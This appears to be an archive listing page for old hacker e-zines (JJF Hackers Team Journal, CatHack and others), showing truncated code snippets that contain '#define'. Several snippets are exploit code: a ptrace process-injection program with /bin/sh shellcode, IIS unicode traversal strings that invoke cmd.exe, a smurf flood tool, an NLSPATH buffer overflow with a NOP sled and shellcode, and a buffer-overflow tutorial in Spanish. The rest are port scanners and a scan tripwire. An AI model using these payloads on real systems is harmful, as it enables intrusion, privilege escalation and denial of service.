#define

4x03: Hardening Slackware

eZine's profile picture
Published in 
 · 1 week ago
... 31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define ADDR 0x00125000 main(int argc, char **argv) { int status; int i, wpid, pid = atoi(argv[1]); struct user_regs_struct regs; if (ptrace(PTRACE_GETREGS, pid, 0, &regs)) { perror("PTRACE_GETREGS"); exit(0); } regs.eip = ADDR; if (ptrace(PTRACE_SETREGS, pid, 0, &regs)) exit(0); for (i = 0; i <= strlen(hellcode) + 5; i += 4) ptrace(PTRACE_POKETEXT, pid, ADDR + i, *(unsigned int *) (hellcode + i)); // kill (pid, SIGSTOP); if (ptrace(PTRACE_DETACH, pid, 0, 0)) exit(0); close(2); do { ...

3x13: Seccion de Software

eZine's profile picture
Published in 
 · 1 week ago
... > #include <string.h> #include <sys/socket.h> #include <signal.h> #include <netinet/in.h> #include <netdb.h> #define BUFF_LEN 6000 #define HTTP " HTTP/1.0\r\n\r\n" #define GET "GET http://" /* this is the anonymous server used */ #define ANON "anon.free.anonymizer.com" /* this are all the types of bugs */ #define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+" #define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0% ...

CatHack Issue 5

eZine's profile picture
Published in 
 · 2 months ago
... ntl.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include <time.h> #ifdef LINUX #define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */ #ifndef _USE_BSD #define _USE_BSD #endif #endif #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/udp.h> #ifdef LINUX #define FIX(n) htons(n) #else #define FIX(n) (n) #endif struct smurf_t { struct sockaddr_in sin; /* socket prot structure */ int s; /* socket */ int udp, icmp; /* icmp, udp booleans */ int rnd; /* Random dst port boolean */ int psize; /* pack ...

CatHack Issue 4

eZine's profile picture
Published in 
 · 2 months ago
... include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define MAX_PORT 1024 /* scan up to this port */ int s; struct sockaddr_in addr; char rmt_host[100]; int skan(port) int port; { int r; s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { /* fprintf("ERROR: socket() failed\n"); */ /* Changed to printf for my Linux 1.1.18 box */ printf("ERROR: socket() failed\n"); exit(0); } addr.sin_family = PF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(rmt_host); r = connect(s,(struct sockaddr *) &addr, si ...

Leeto Phreako Headz Issue 5

eZine's profile picture
Published in 
 · 2 months ago
... nclude <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT 3 #define BACKLOG 1 //Port Tripwire BETA //made for BSD or any ipfw firewalled OS //by phractal int main() { //printf("PortScan Tripwire BETA by phractal \n"); int fd=socket(AF_INET,SOCK_STREAM,0); int fd2; struct sockaddr_in server; struct sockaddr_in client; int sin_size; server.sin_family = AF_INET; server.sin_port = htons(PORT); server.sin_addr.s_addr = INADDR_ANY; bzero(&(server.sin_zero),8); bind(fd,(struct sockaddr*)&server,sizeof(struct socka ...

JJF Hackers Team Journal 7

eZine's profile picture
Published in 
 · 2 months ago
... /IP), fluent in C and C++, and working on becoming a * proficient Windows programmer. * */ #include <stdio.h> #include <string.h> #define BUFFER 30 int DecodeCharOne(unsigned char *); int DecodeCharTwo(unsigned char *); int DecodeCharThree(unsigned char *); int DecodeCharFour(unsigned char *); int DecodeCharFive(unsigned char *); int DecodeCharSix(unsigned char *); int DecodeCharSeven(unsigned char *); int DecodeCharEight(unsigned char *); main() { int i; /* Generic counter */ int eocc = 0; /* Records if there has been an error */ /* The following structure stores the encoded bytes. Decoded values * replace th ...

JJF Hackers Team Journal 6

eZine's profile picture
Published in 
 · 2 months ago
... ---------------------- #include "getresponse.h" #include <stdio.h> #include <string.h> #include <stdlib.h> #include <ctype.h> #define private private_hack extern "C" { #include <sio.h> #include <sct0.h> #include <sc.h> } #undef private int timeout; SIO_INFO* si; Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 }; Byte gsm_file[] = { 0x7f, 0x20 }; Byte gsm2_file[] = { 0x7f, 0x21 }; Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 }; Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 }; Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 }; void init_card(char* devicename, Byte pin[8]) { Byte buffer[32]; in ...

JJF Hackers Team Journal 5

eZine's profile picture
Published in 
 · 2 months ago
... xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); system("clear"); printf("______________________________________________________________\n"); printf("| RSH Overflow -- (c) shit-head 1997\n"); printf("| Give props to Solar Designer for his su overflow, this is based on that.\ ...

JJF Hackers Team Journal 3

eZine's profile picture
Published in 
 · 2 months ago
... include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define MAX_PORT 1024 /* scan up to this port */ int s; struct sockaddr_in addr; char rmt_host[100]; int skan(port) int port; { int r; s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { /* fprintf("ERROR: socket() failed\n"); */ /* Changed to printf for my Linux 1.1.18 box */ printf("ERROR: socket() failed\n"); exit(0); } addr.sin_family = PF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(rmt_host); r = connect(s,(struct sockaddr *) &addr, si ...

JJF Hackers Team Journal 1

eZine's profile picture
Published in 
 · 2 months ago
... guiente ejemplo lv_size es el tama¤o de la variable local que queremos desbordar y buffer es el nombre del campo de datos (que tambien es local). ej. #define lv_size=1024 char buffer[lv_size+8] A¤adimos exactamente 8 bytes, mira mas detenidamente la pila de arriba y sabras por que. Si queremos sobreescribir la direccion de retorno tenemos que sobreescribir 4 bytes el puntero base y 4 bytes la direccion de retorno. El campo de datos buffer deberia aparecer asi: ... <nop> <nop> <nop> <nop> <nop> <codigo que ejecuta una shell> Analiza este codigo en c para aprender como podemos hacer esto, lv_size es una abreviatura ...
loading
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT